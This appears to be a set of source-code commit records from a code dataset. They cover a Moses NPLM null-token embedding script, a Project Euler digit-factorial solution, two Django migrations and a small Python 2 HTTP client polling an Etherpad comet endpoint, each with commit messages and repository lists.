parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
null_idx = 1
)
options,_ = parser.parse_args(sys.argv)
sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict
def load_model(model_file):
return nplm.NeuralLM.from_file(model_file)
def get_weights(path, length):
d = [0]*length
for line in open(path):
last_context = int(line.split()[-2])
d[last_context] += 1
return d
if __name__ == "__main__":
a = load_model(options.input_model)
print 'before:'
print a.input_embeddings[options.null_idx]
weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
print 'after:'
print a.input_embeddings[options.null_idx]
a.to_file(open(options.output_model,'w'))
|
Add null token normalization for models to be used with the chart decoder.
|
Add null token normalization for models to be used with the chart decoder.
|
Python
|
lgpl-2.1
|
alvations/mosesdecoder,emjotde/mosesdecoder_nmt,moses-smt/mosesdecoder,alvations/mosesdecoder,moses-smt/mosesdecoder,KonceptGeek/mosesdecoder,moses-smt/mosesdecoder,KonceptGeek/mosesdecoder,KonceptGeek/mosesdecoder,hychyc07/mosesdecoder,KonceptGeek/mosesdecoder,moses-smt/mosesdecoder,alvations/mosesdecoder,tofula/mosesdecoder,pjwilliams/mosesdecoder,hychyc07/mosesdecoder,alvations/mosesdecoder,emjotde/mosesdecoder_nmt,KonceptGeek/mosesdecoder,tofula/mosesdecoder,moses-smt/mosesdecoder,KonceptGeek/mosesdecoder,alvations/mosesdecoder,tofula/mosesdecoder,alvations/mosesdecoder,KonceptGeek/mosesdecoder,hychyc07/mosesdecoder,moses-smt/mosesdecoder,alvations/mosesdecoder,tofula/mosesdecoder,emjotde/mosesdecoder_nmt,emjotde/mosesdecoder_nmt,moses-smt/mosesdecoder,tofula/mosesdecoder,tofula/mosesdecoder,hychyc07/mosesdecoder,tofula/mosesdecoder,moses-smt/mosesdecoder,pjwilliams/mosesdecoder,tofula/mosesdecoder,emjotde/mosesdecoder_nmt,KonceptGeek/mosesdecoder,emjotde/mosesdecoder_nmt,hychyc07/mosesdecoder,hychyc07/mosesdecoder,tofula/mosesdecoder,hychyc07/mosesdecoder,alvations/mosesdecoder,pjwilliams/mosesdecoder,pjwilliams/mosesdecoder,tofula/mosesdecoder,pjwilliams/mosesdecoder,moses-smt/mosesdecoder,alvations/mosesdecoder,hychyc07/mosesdecoder,moses-smt/mosesdecoder,hychyc07/mosesdecoder,KonceptGeek/mosesdecoder,alvations/mosesdecoder,KonceptGeek/mosesdecoder,pjwilliams/mosesdecoder,pjwilliams/mosesdecoder,moses-smt/mosesdecoder,emjotde/mosesdecoder_nmt,emjotde/mosesdecoder_nmt,alvations/mosesdecoder,hychyc07/mosesdecoder,pjwilliams/mosesdecoder,pjwilliams/mosesdecoder,tofula/mosesdecoder,emjotde/mosesdecoder_nmt,pjwilliams/mosesdecoder,emjotde/mosesdecoder_nmt
|
Add null token normalization for models to be used with the chart decoder.
|
#!/usr/bin/env python2
import sys
import numpy
import optparse
#sys.path.append('/data/tools/nplm/python')
parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
null_idx = 1
)
options,_ = parser.parse_args(sys.argv)
sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict
def load_model(model_file):
return nplm.NeuralLM.from_file(model_file)
def get_weights(path, length):
d = [0]*length
for line in open(path):
last_context = int(line.split()[-2])
d[last_context] += 1
return d
if __name__ == "__main__":
a = load_model(options.input_model)
print 'before:'
print a.input_embeddings[options.null_idx]
weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
print 'after:'
print a.input_embeddings[options.null_idx]
a.to_file(open(options.output_model,'w'))
|
<commit_before><commit_msg>Add null token normalization for models to be used with the chart decoder.<commit_after>
|
#!/usr/bin/env python2
import sys
import numpy
import optparse
#sys.path.append('/data/tools/nplm/python')
parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
null_idx = 1
)
options,_ = parser.parse_args(sys.argv)
sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict
def load_model(model_file):
return nplm.NeuralLM.from_file(model_file)
def get_weights(path, length):
d = [0]*length
for line in open(path):
last_context = int(line.split()[-2])
d[last_context] += 1
return d
if __name__ == "__main__":
a = load_model(options.input_model)
print 'before:'
print a.input_embeddings[options.null_idx]
weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
print 'after:'
print a.input_embeddings[options.null_idx]
a.to_file(open(options.output_model,'w'))
|
Add null token normalization for models to be used with the chart decoder.#!/usr/bin/env python2
import sys
import numpy
import optparse
#sys.path.append('/data/tools/nplm/python')
parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
null_idx = 1
)
options,_ = parser.parse_args(sys.argv)
sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict
def load_model(model_file):
return nplm.NeuralLM.from_file(model_file)
def get_weights(path, length):
d = [0]*length
for line in open(path):
last_context = int(line.split()[-2])
d[last_context] += 1
return d
if __name__ == "__main__":
a = load_model(options.input_model)
print 'before:'
print a.input_embeddings[options.null_idx]
weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
print 'after:'
print a.input_embeddings[options.null_idx]
a.to_file(open(options.output_model,'w'))
|
<commit_before><commit_msg>Add null token normalization for models to be used with the chart decoder.<commit_after>#!/usr/bin/env python2
import sys
import numpy
import optparse
#sys.path.append('/data/tools/nplm/python')
parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
null_idx = 1
)
options,_ = parser.parse_args(sys.argv)
sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict
def load_model(model_file):
return nplm.NeuralLM.from_file(model_file)
def get_weights(path, length):
d = [0]*length
for line in open(path):
last_context = int(line.split()[-2])
d[last_context] += 1
return d
if __name__ == "__main__":
a = load_model(options.input_model)
print 'before:'
print a.input_embeddings[options.null_idx]
weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
print 'after:'
print a.input_embeddings[options.null_idx]
a.to_file(open(options.output_model,'w'))
|
|
983085ed78b157b5c1c2e525506a3221c7a3881a
|
problem_34.py
|
problem_34.py
|
from problem_20 import factorial
from time import time
def calculate_digit_factorials(start, end):
known_factorials = {}
digit_factorials = []
for num in range(start, end):
factorial_sum = 0
for digit in str(num):
if digit not in known_factorials:
known_factorials[digit] = factorial(int(digit))
factorial_sum += known_factorials[digit]
if num == factorial_sum:
digit_factorials.append(num)
return digit_factorials
if __name__ == '__main__':
t = time()
digit_factorials = calculate_digit_factorials(10, 50000)
print 'Factorials:', digit_factorials
print 'Sum:', sum(digit_factorials)
print 'Time:', time() - t
|
Add problem 34, digit factorials
|
Add problem 34, digit factorials
|
Python
|
mit
|
dimkarakostas/project-euler
|
Add problem 34, digit factorials
|
from problem_20 import factorial
from time import time
def calculate_digit_factorials(start, end):
known_factorials = {}
digit_factorials = []
for num in range(start, end):
factorial_sum = 0
for digit in str(num):
if digit not in known_factorials:
known_factorials[digit] = factorial(int(digit))
factorial_sum += known_factorials[digit]
if num == factorial_sum:
digit_factorials.append(num)
return digit_factorials
if __name__ == '__main__':
t = time()
digit_factorials = calculate_digit_factorials(10, 50000)
print 'Factorials:', digit_factorials
print 'Sum:', sum(digit_factorials)
print 'Time:', time() - t
|
<commit_before><commit_msg>Add problem 34, digit factorials<commit_after>
|
from problem_20 import factorial
from time import time
def calculate_digit_factorials(start, end):
known_factorials = {}
digit_factorials = []
for num in range(start, end):
factorial_sum = 0
for digit in str(num):
if digit not in known_factorials:
known_factorials[digit] = factorial(int(digit))
factorial_sum += known_factorials[digit]
if num == factorial_sum:
digit_factorials.append(num)
return digit_factorials
if __name__ == '__main__':
t = time()
digit_factorials = calculate_digit_factorials(10, 50000)
print 'Factorials:', digit_factorials
print 'Sum:', sum(digit_factorials)
print 'Time:', time() - t
|
Add problem 34, digit factorialsfrom problem_20 import factorial
from time import time
def calculate_digit_factorials(start, end):
known_factorials = {}
digit_factorials = []
for num in range(start, end):
factorial_sum = 0
for digit in str(num):
if digit not in known_factorials:
known_factorials[digit] = factorial(int(digit))
factorial_sum += known_factorials[digit]
if num == factorial_sum:
digit_factorials.append(num)
return digit_factorials
if __name__ == '__main__':
t = time()
digit_factorials = calculate_digit_factorials(10, 50000)
print 'Factorials:', digit_factorials
print 'Sum:', sum(digit_factorials)
print 'Time:', time() - t
|
<commit_before><commit_msg>Add problem 34, digit factorials<commit_after>from problem_20 import factorial
from time import time
def calculate_digit_factorials(start, end):
known_factorials = {}
digit_factorials = []
for num in range(start, end):
factorial_sum = 0
for digit in str(num):
if digit not in known_factorials:
known_factorials[digit] = factorial(int(digit))
factorial_sum += known_factorials[digit]
if num == factorial_sum:
digit_factorials.append(num)
return digit_factorials
if __name__ == '__main__':
t = time()
digit_factorials = calculate_digit_factorials(10, 50000)
print 'Factorials:', digit_factorials
print 'Sum:', sum(digit_factorials)
print 'Time:', time() - t
|
|
3dbc4715cba02850b8062c9db4d954cc913b7492
|
blog/migrations/0008_remove_commenters_without_posts.py
|
blog/migrations/0008_remove_commenters_without_posts.py
|
from django.db import migrations
def remove_commenters_without_post(apps, schema_editor):
Commenter = apps.get_model('blog', 'Commenter')
Commenter.objects.filter(comments__isnull=True).delete()
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_protect_articles_from_user_deletion'),
]
operations = [
migrations.RunPython(
remove_commenters_without_post,
migrations.RunPython.noop,
elidable=True,
),
]
|
Add a migration to remove garbage commenter objects
|
Add a migration to remove garbage commenter objects
|
Python
|
bsd-2-clause
|
w0rp/w0rpzone,w0rp/w0rpzone,w0rp/w0rpzone,w0rp/w0rpzone
|
Add a migration to remove garbage commenter objects
|
from django.db import migrations
def remove_commenters_without_post(apps, schema_editor):
Commenter = apps.get_model('blog', 'Commenter')
Commenter.objects.filter(comments__isnull=True).delete()
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_protect_articles_from_user_deletion'),
]
operations = [
migrations.RunPython(
remove_commenters_without_post,
migrations.RunPython.noop,
elidable=True,
),
]
|
<commit_before><commit_msg>Add a migration to remove garbage commenter objects<commit_after>
|
from django.db import migrations
def remove_commenters_without_post(apps, schema_editor):
Commenter = apps.get_model('blog', 'Commenter')
Commenter.objects.filter(comments__isnull=True).delete()
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_protect_articles_from_user_deletion'),
]
operations = [
migrations.RunPython(
remove_commenters_without_post,
migrations.RunPython.noop,
elidable=True,
),
]
|
Add a migration to remove garbage commenter objectsfrom django.db import migrations
def remove_commenters_without_post(apps, schema_editor):
Commenter = apps.get_model('blog', 'Commenter')
Commenter.objects.filter(comments__isnull=True).delete()
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_protect_articles_from_user_deletion'),
]
operations = [
migrations.RunPython(
remove_commenters_without_post,
migrations.RunPython.noop,
elidable=True,
),
]
|
<commit_before><commit_msg>Add a migration to remove garbage commenter objects<commit_after>from django.db import migrations
def remove_commenters_without_post(apps, schema_editor):
Commenter = apps.get_model('blog', 'Commenter')
Commenter.objects.filter(comments__isnull=True).delete()
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_protect_articles_from_user_deletion'),
]
operations = [
migrations.RunPython(
remove_commenters_without_post,
migrations.RunPython.noop,
elidable=True,
),
]
|
|
24dd968202329c5f524645e764b9ad0c84324cdb
|
webapp/apps/taxbrain/migrations/0014_auto_20151124_2029.py
|
webapp/apps/taxbrain/migrations/0014_auto_20151124_2029.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import webapp.apps.taxbrain.models
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0013_auto_20151120_2141'),
]
operations = [
migrations.AddField(
model_name='taxsaveinputs',
name='ID_BenefitSurtax_Switch_6',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_RealEstate_HC',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
]
|
Add migration for new field in TaxSaveInputs
|
Add migration for new field in TaxSaveInputs
|
Python
|
mit
|
zrisher/webapp-public,zrisher/webapp-public,OpenSourcePolicyCenter/webapp-public,OpenSourcePolicyCenter/webapp-public,zrisher/webapp-public,OpenSourcePolicyCenter/PolicyBrain,OpenSourcePolicyCenter/PolicyBrain,OpenSourcePolicyCenter/webapp-public,OpenSourcePolicyCenter/PolicyBrain,zrisher/webapp-public,OpenSourcePolicyCenter/webapp-public,OpenSourcePolicyCenter/PolicyBrain
|
Add migration for new field in TaxSaveInputs
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import webapp.apps.taxbrain.models
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0013_auto_20151120_2141'),
]
operations = [
migrations.AddField(
model_name='taxsaveinputs',
name='ID_BenefitSurtax_Switch_6',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_RealEstate_HC',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
]
|
<commit_before><commit_msg>Add migration for new field in TaxSaveInputs<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import webapp.apps.taxbrain.models
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0013_auto_20151120_2141'),
]
operations = [
migrations.AddField(
model_name='taxsaveinputs',
name='ID_BenefitSurtax_Switch_6',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_RealEstate_HC',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
]
|
Add migration for new field in TaxSaveInputs# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import webapp.apps.taxbrain.models
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0013_auto_20151120_2141'),
]
operations = [
migrations.AddField(
model_name='taxsaveinputs',
name='ID_BenefitSurtax_Switch_6',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_RealEstate_HC',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
]
|
<commit_before><commit_msg>Add migration for new field in TaxSaveInputs<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import webapp.apps.taxbrain.models
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0013_auto_20151120_2141'),
]
operations = [
migrations.AddField(
model_name='taxsaveinputs',
name='ID_BenefitSurtax_Switch_6',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_RealEstate_HC',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
]
|
|
8c1785e9df05c4c37a66efa12919e59eefb08672
|
client/comet/server.py
|
client/comet/server.py
|
#!/usr/bin/python
import httplib
con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()
params = {
"Host": "kevinwells.homeip.net:8082",
"User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive": "115",
"Connection": "keep-alive",
"Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
"Origin": "http://kevinwells.homeip.net:8083"
}
url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)
response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()
con.close()
|
Add simple client that gets a url from Etherpad.
|
Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu>
|
Python
|
apache-2.0
|
PolicyStat/PolicyPad,PolicyStat/PolicyPad,PolicyStat/PolicyPad
|
Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu>
|
#!/usr/bin/python
import httplib
con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()
params = {
"Host": "kevinwells.homeip.net:8082",
"User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive": "115",
"Connection": "keep-alive",
"Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
"Origin": "http://kevinwells.homeip.net:8083"
}
url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)
response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()
con.close()
|
<commit_before><commit_msg>Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu><commit_after>
|
#!/usr/bin/python
import httplib
con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()
params = {
"Host": "kevinwells.homeip.net:8082",
"User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive": "115",
"Connection": "keep-alive",
"Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
"Origin": "http://kevinwells.homeip.net:8083"
}
url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)
response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()
con.close()
|
Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu>#!/usr/bin/python
import httplib
con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()
params = {
"Host": "kevinwells.homeip.net:8082",
"User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive": "115",
"Connection": "keep-alive",
"Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
"Origin": "http://kevinwells.homeip.net:8083"
}
url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)
response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()
con.close()
|
<commit_before><commit_msg>Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu><commit_after>#!/usr/bin/python
import httplib
con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()
params = {
"Host": "kevinwells.homeip.net:8082",
"User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive": "115",
"Connection": "keep-alive",
"Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
"Origin": "http://kevinwells.homeip.net:8083"
}
url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)
response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()
con.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.